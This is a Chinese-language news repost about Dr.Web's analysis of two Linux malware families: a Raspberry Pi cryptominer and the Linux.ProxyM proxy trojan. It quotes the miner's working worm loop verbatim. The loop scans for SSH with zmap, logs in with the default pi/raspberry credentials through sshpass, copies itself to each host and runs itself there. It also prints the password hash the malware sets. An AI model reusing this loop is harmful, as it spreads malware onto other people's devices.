俄羅斯反病毒開發商dr. web公司的惡意軟體研究人員們已經發現了兩款新型linux惡意軟體,分别名為kinux.muldrop.14和linux.proxym。
kinux.muldrop.14:主要用于挖掘加密貨币
根據dr. web公司介紹,kinux.muldrop.14的能夠感染樹莓派(raspberry pi)裝置以借此實作加密貨币挖掘。該惡意軟體于今年5月份被首次發現,研究人員們找到了一套包含壓縮與加密應用程式的腳本。
kinux.muldrop.14主要針對具備ssh外部開放端口的非安全樹莓派裝置。
此linux惡意軟體為一款包含采礦程式的bash腳本,其利用gzip壓縮并配合base64加密機制。一旦被啟用,該腳本将關閉多個程序并安裝其操作所需要的庫。
一旦此linux惡意軟體成功感染裝置,其即會首先修改“pi”帳戶的密碼内容:
$6\$u1nu9qcp$fhpuo8s5psqlh6lwudtwfcaupnzmr0pwcdnjj.p6l4mzi8s867ylmc7bspmeh95povxpq3pzp029yt1l3yi6k1
另外,該惡意軟體會關閉多項程序并安裝zmap以及sshpass等庫。
在此之後,該惡意軟體會啟動一個加密貨币挖掘程序,并利用zmap掃描網際網路以尋找其它可資感染的裝置。
當此linux惡意軟體在網際網路上找到某一台樹莓派裝置時,其會利用sshpass以嘗試使用預設使用者名“pi”及預設密碼“raspberry”進行登入。
該惡意軟體隻會嘗試使用數個值,這表明其專門針對raspberry pi裝置。專家們認為,此惡意軟體可實作進一步改進,進而在未來幾周内用于攻擊其它平台。
以下為dr. web公司公布的代碼片段:
name=<code>mktemp -u 'xxxxxxxx'</code>
while [ true ]; do
file=<code>mktemp</code>
zmap -p 22 -o $file -n 100000
killall ssh scp
for ip in <code>cat $file</code>
do
sshpass -praspberry scp -o connecttimeout=6 -o numberofpasswordprompts=1 -o preferredauthentications=password -o userknownhostsfile=/dev/null -o stricthostkeychecking=no $myself pi@$ip:/tmp/$name && echo $ip >> /tmp/.r && sshpass -praspberry ssh pi@$ip -o connecttimeout=6 -o numberofpasswordprompts=1 -o preferredauthentications=password -o userknownhostsfile=/dev/null -o stricthostkeychecking=no "cd /tmp && chmod +x $name && bash -c ./$name" &
done
rm -rf $file
sleep 10
linux.proxym:用于建立代理網絡
dr. web公司的研究人員們還分析了另一款新型linux惡意軟體名為linux.proxym,其主要用于建立代理網絡。攻擊者自2017年2月開始即利用此木馬實施攻擊,但直到5月底此類活動才達到頂峰。受到linux.proxym感染的裝置數量如今已經超過1萬台。
下圖所示為dr. web公司安全專家們所确定的linux.proxym攻擊活動數量。
兩款新型linux惡意軟體:一個挖加密貨币,一個建立代理網絡-e安全
該惡意代碼會在受感染裝置上建立一套socks代理伺服器,并将其用于中繼惡意流量以掩飾真實來源。
本文轉自d1net(轉載)
![linux-svn解除安裝與安裝[圖]](data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=)